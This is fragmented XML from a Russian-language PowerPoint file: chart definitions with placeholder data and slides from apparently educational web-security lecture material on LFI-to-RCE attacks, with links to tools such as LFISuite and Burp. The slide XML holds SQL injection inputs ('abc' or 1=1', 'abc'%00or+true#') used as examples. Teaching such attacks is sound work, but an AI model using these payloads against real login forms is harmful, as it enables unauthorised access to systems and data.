              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000002-B591-4B88-85CA-EE1F8587699B}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:marker>
              <c:symbol val="none"/>
            </c:marker>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:ln w="22225" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="8EB6F8"/>
                </a:solidFill>
                <a:round/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000004-B591-4B88-85CA-EE1F8587699B}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:cat>
            <c:strRef>
              <c:f>Лист1!$A$2:$A$7</c:f>
              <c:strCache>
                <c:ptCount val="6"/>
                <c:pt idx="0">
                  <c:v>Q1 2017</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Q2 2021</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Q3 2022</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Q1 2020</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Q2 2021</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Q3 2022</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Лист1!$C$2:$C$7</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="6"/>
                <c:pt idx="0">
                  <c:v>0.81</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.05</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0.89</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>0.5</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>0.08</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>0.69</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000005-B591-4B88-85CA-EE1F8587699B}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>Лист1!$D$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Столбец1</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln w="22225" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="E165A6"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>Лист1!$A$2:$A$7</c:f>
              <c:strCache>
                <c:ptCount val="6"/>
                <c:pt idx="0">
                  <c:v>Q1 2017</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Q2 2021</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Q3 2022</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Q1 2020</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Q2 2021</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Q3 2022</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Лист1!$D$2:$D$7</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="6"/>
                <c:pt idx="0">
                  <c:v>0.52</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.34</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0.28999999999999998</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>0.3</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>0.34</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>0.28999999999999998</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000006-B591-4B88-85CA-EE1F8587699B}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:smooth val="0"/>
        <c:axId val="441752512"/>
        <c:axId val="441752840"/>
      </c:lineChart>
      <c:catAx>
        <c:axId val="441752512"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="1"/>
        <c:axPos val="b"/>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="out"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="441752840"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="4417528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ru-RU"/>
          </a:p>
        </c:txPr>
        <c:crossAx val="441752512"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="between"/>
      </c:valAx>
      <c:spPr>
        <a:noFill/>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst/>
      </c:spPr>
    </c:plotArea>
    <c:plotVisOnly val="1"/>
    <c:dispBlanksAs val="gap"/>
    <c:showDLblsOverMax val="0"/>
  </c:chart>
  <c:spPr>
    <a:noFill/>
    <a:ln>
      <a:noFill/>
    </a:ln>
    <a:effectLst/>
  </c:spPr>
  <c:txPr>
    <a:bodyPr/>
    <a:lstStyle/>
    <a:p>
      <a:pPr>
        <a:defRPr sz="700"/>
      </a:pPr>
      <a:endParaRPr lang="ru-RU"/>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911794727721994"/>
          <c:y val="9.2104904865294004E-2"/>
          <c:w val="0.36600676304040602"/>
          <c:h val="0.84761384425253383"/>
        </c:manualLayout>
      </c:layout>
      <c:doughnutChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>Лист1!$B$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Продажи</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:ln w="76200" cap="rnd">
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:dPt>
            <c:idx val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ln w="76200" cap="rnd">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000001-1DB5-42E2-880D-0E92DAF671A5}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:ln w="76200" cap="rnd">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000003-1DB5-42E2-880D-0E92DAF671A5}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="2"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:ln w="76200" cap="rnd">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000005-1DB5-42E2-880D-0E92DAF671A5}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="3"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:ln w="76200" cap="rnd">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000007-1DB5-42E2-880D-0E92DAF671A5}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="4"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
              <a:ln w="76200" cap="rnd">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000009-1DB5-42E2-880D-0E92DAF671A5}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="5"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ln w="76200" cap="rnd">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{0000000B-1DB5-42E2-880D-0E92DAF671A5}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="6"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="8EB6F8"/>
              </a:solidFill>
              <a:ln w="76200" cap="rnd">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{0000000D-1DB5-42E2-880D-0E92DAF671A5}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="7"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ln w="76200" cap="rnd">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{0000000F-1DB5-42E2-880D-0E92DAF671A5}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="8"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="E165A6"/>
              </a:solidFill>
              <a:ln w="76200" cap="rnd">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000011-1DB5-42E2-880D-0E92DAF671A5}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="9"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ln w="76200" cap="rnd">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000013-1DB5-42E2-880D-0E92DAF671A5}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="10"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ln w="76200" cap="rnd">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000015-1DB5-42E2-880D-0E92DAF671A5}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="11"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ln w="76200" cap="rnd">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000017-1DB5-42E2-880D-0E92DAF671A5}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:cat>
            <c:strRef>
              <c:f>Лист1!$A$2:$A$13</c:f>
              <c:strCache>
                <c:ptCount val="12"/>
                <c:pt idx="0">
                  <c:v>Показатель 1</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Показатель 2</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Показатель 3</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Показатель 4</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Показатель 5</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Показатель 6</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>Показатель 7</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>Показатель 8</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>Показатель  9</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>Показатель 10</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>Показатель 11</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>Показатель 12</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Лист1!$B$2:$B$13</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="12"/>
                <c:pt idx="0">
                  <c:v>0.05</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.03</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0.01</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>0.02</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>0.05</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>0.04</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>0.06</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>7.0000000000000007E-2</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>0.03</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>0.02</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>0.06</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>0.05</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000018-1DB5-42E2-880D-0E92DAF671A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sz="600"/>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1B6AB-B694-4E86-8873-690B1D1AAE4C}" type="datetimeFigureOut">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>20.06.2022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E60-5E3E-4AAB-B5EC-6CA89797E6E9}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="416555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habr.com/ru/post/510998/"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portswigger.net/burp" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/D35m0nd142/LFISuite"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raz0r.name/articles/null-byte-alternativ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habr.com/ru/post/510998/"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portswigger.net/burp" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/D35m0nd142/LFISuite"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wasp.org/index.php/PHP_CSRF_Guar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owasp.org/index.php/PHP_CSRF_Guar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wasp.org/index.php/PHP_CSRF_Guar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a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="271591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11</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2556251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13</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2274527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73660" marR="2950845" algn="just">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>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иложению</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-6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прихо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д</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ят</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два</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разных</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запроса:</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7980" marR="3957320" algn="just">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="470"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>• …/?logi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" spc="-6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or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" spc="-1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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" spc="-2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347980" marR="3679190" algn="just">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="470"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>• …/?logi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>=abc'%00or+true#</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2078355" algn="just">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="47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Каждый</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из</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них</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раскладывается</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на</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кены</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с</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>м.</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err="1">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Таб</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" spc="-5" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>л</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" spc="-3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10).</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14</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3654560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15</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2581923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16</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="239059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b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Безопасность веб: от LFI до RCE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>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Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>https://3-info.ru/post/24097</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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Local File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Inclusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> (LFI) — это возможность использования локальных файлов сервера. Уязвимость позволяет удаленному пользователю получить доступ с помощью специально сформированного запроса к произвольным файлам на сервере, в том числе потенциально содержащим конфиденциальную информацию.</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Возникает подобная уязвимость в том случае, если при реализации веб-приложения используются небезопасные функции, например, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
